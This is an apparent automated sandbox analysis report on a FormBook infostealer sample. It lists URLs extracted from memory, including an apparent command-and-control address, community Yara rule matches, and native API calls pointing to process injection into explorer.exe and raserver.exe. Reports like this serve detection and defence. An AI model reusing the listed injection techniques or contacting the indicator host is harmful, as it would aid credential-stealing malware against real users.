          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAUhLdx.img
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAY97Jf.img
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAaeOki.img
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyxkRJ.img
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1d0ujS.img
          Source: explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=a7af015c-55f5-465b-b0e4-6fef
          Source: explorer.exe, 00000004.00000003.8623027004.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11896448781.0000000010A85000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286306641.0000000010A43000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6857495261.0000000010A43000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000004.00000003.8626378435.000000000CFDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6852064723.000000000CFB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11891782059.000000000CFDB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com0
          Source: kHslwiV2w6.exeString found in binary or memory: https://sectigo.com/CPS0
          Source: explorer.exe, 00000004.00000002.11899785830.000000001444F000.00000004.80000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11883241933.0000000005A3F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://status.squarespace.com
          Source: explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://th.bi
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000004.00000003.8285449351.0000000010BEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6858022237.0000000010BA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287825721.0000000010C9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11897707281.0000000010C91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286577674.0000000010C83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
          Source: explorer.exe, 00000004.00000002.11896246348.0000000010A43000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286306641.0000000010A43000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6857495261.0000000010A43000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comut
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.glamour.com/story/shag-haircut-photos-products
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.instyle.com/hair/shag-haircut-face-shape
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/autos/other/24-used-sports-cars-that-are-notoriously-reliable-yet-crazy-ch
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/channel/source/AZ%20Animals%20US/sr-vid-7etr9q8xun6k6508c3nufaum0de3dqktiq
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/entertainment/news/james-earl-jones-dies-at-93-all-about-his-son-flynn/ar-
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/feed
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/recipes/i-asked-3-farmers-the-best-way-to-cook-zucchini-they-
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/medical/2-egg-brands-have-been-recalled-due-to-a-serious-salmonella
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/beauty/40-shag-haircuts-to-inspire-your-next-salon-visit/ss-AA1p
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets?id=a33k6h
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets?id=a3oxnm
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets?id=a6qja2
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/18-everyday-household-items-that-are-surprisingly-va
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/retirement/a-youtuber-asked-a-group-of-americans-aged-70-to-80-what-
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/retirement/middle-aged-americans-are-leaving-work-for-months-years-t
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/dick-van-dyke-forever-young/ar-AA1lDpRD
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/tyreek-hill-s-traffic-stop-shows-interactions-with-police-can-b
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/6-things-to-watch-for-when-kamala-harris-debates-donald-trum
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/chris-christie-former-trump-debate-coach-offers-key-pieces-o
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/jd-vance-spreads-outrageous-lie-about-haitian-immigrants/ar-
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/james-earl-jones-s-talents-went-far-far-beyond-his-magnificent-voi
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/trump-repeats-false-claims-that-children-are-undergoing-transgende
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/gaza-authorities-say-deadly-blasts-hit-humanitarian-zone/ar-AA1
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/nba/johnny-gaudreau-s-wife-reveals-in-eulogy-she-s-pregnant-expecti
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/nfl/49ers-win-over-jets-ends-with-final-score-that-s-never-been-see
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/scientists-finally-solve-mystery-behind-bermuda-triangle-disap
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/news/the-bold-the-beautiful-young-and-the-restless-more-get-premiere-da
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/forecast/in-Santa
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/forecast/in-Santa-Clara%2CCalifornia?loc=eyJsIjoiU2FudGEgQ2xhcmEiL
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/hourlyforecast/in-Santa-Clara%2CCalifornia?loc=eyJsIjoiU2FudGEgQ2x
          Source: explorer.exe, 00000004.00000002.11899785830.000000001444F000.00000004.80000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11883241933.0000000005A3F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.webuyandsellpa.com/md02/?all=e9dCEAefob0qfIp2qzYjc8hnpuRDR3iBtFDetlkNhl3JkGKef1d6ICtGRMu

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D20115 SysStringLen,CryptDestroyKey,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,SysStringLen,SysStringLen,CryptImportKey,free,SysStringLen,CryptDecrypt,SysAllocStringByteLen,SysFreeString,free,5_2_00D20115
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D20383 SysStringLen,CryptImportKey,GetLastError,CryptGenKey,GetLastError,CryptEncrypt,GetLastError,free,malloc,memset,memcpy,CryptEncrypt,GetLastError,free,SysFreeString,SysFreeString,CryptDestroyKey,CryptDestroyKey,SysFreeString,5_2_00D20383

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: kHslwiV2w6.exe PID: 7164, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: csc.exe PID: 1408, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: raserver.exe PID: 6624, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041A360 NtCreateFile,3_2_0041A360
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041A410 NtReadFile,3_2_0041A410
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041A490 NtClose,3_2_0041A490
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041A540 NtAllocateVirtualMemory,3_2_0041A540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041A35B NtCreateFile,3_2_0041A35B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041A3B2 NtCreateFile,3_2_0041A3B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041A40A NtReadFile,3_2_0041A40A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041A48B NtClose,3_2_0041A48B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_05CA2DC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2DA0 NtReadVirtualMemory,LdrInitializeThunk,3_2_05CA2DA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_05CA2D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2CF0 NtDelayExecution,LdrInitializeThunk,3_2_05CA2CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2C50 NtUnmapViewOfSection,LdrInitializeThunk,3_2_05CA2C50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2C30 NtMapViewOfSection,LdrInitializeThunk,3_2_05CA2C30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2F00 NtCreateFile,LdrInitializeThunk,3_2_05CA2F00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2ED0 NtResumeThread,LdrInitializeThunk,3_2_05CA2ED0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2EB0 NtProtectVirtualMemory,LdrInitializeThunk,3_2_05CA2EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2E50 NtCreateSection,LdrInitializeThunk,3_2_05CA2E50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA29F0 NtReadFile,LdrInitializeThunk,3_2_05CA29F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2BC0 NtQueryInformationToken,LdrInitializeThunk,3_2_05CA2BC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_05CA2B90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2B10 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_05CA2B10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2A80 NtClose,LdrInitializeThunk,3_2_05CA2A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA4570 NtSuspendThread,3_2_05CA4570
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA34E0 NtCreateMutant,3_2_05CA34E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA4260 NtSetContextThread,3_2_05CA4260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2D50 NtWriteVirtualMemory,3_2_05CA2D50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2CD0 NtEnumerateKey,3_2_05CA2CD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA3C90 NtOpenThread,3_2_05CA3C90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2C10 NtOpenProcess,3_2_05CA2C10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2C20 NtSetInformationFile,3_2_05CA2C20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA3C30 NtOpenProcessToken,3_2_05CA3C30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2FB0 NtSetValueKey,3_2_05CA2FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2F30 NtOpenDirectoryObject,3_2_05CA2F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2EC0 NtQuerySection,3_2_05CA2EC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2E80 NtCreateProcessEx,3_2_05CA2E80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2E00 NtQueueApcThread,3_2_05CA2E00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA29D0 NtWaitForSingleObject,3_2_05CA29D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA38D0 NtGetContextThread,3_2_05CA38D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2BE0 NtQueryVirtualMemory,3_2_05CA2BE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2B80 NtCreateKey,3_2_05CA2B80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2B00 NtQueryValueKey,3_2_05CA2B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2B20 NtQueryInformationProcess,3_2_05CA2B20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2AC0 NtEnumerateValueKey,3_2_05CA2AC0
          Source: C:\Windows\explorer.exeCode function: 4_2_0287EE12 NtProtectVirtualMemory,4_2_0287EE12
          Source: C:\Windows\explorer.exeCode function: 4_2_0287D232 NtCreateFile,4_2_0287D232
          Source: C:\Windows\explorer.exeCode function: 4_2_0287EE0A NtProtectVirtualMemory,4_2_0287EE0A
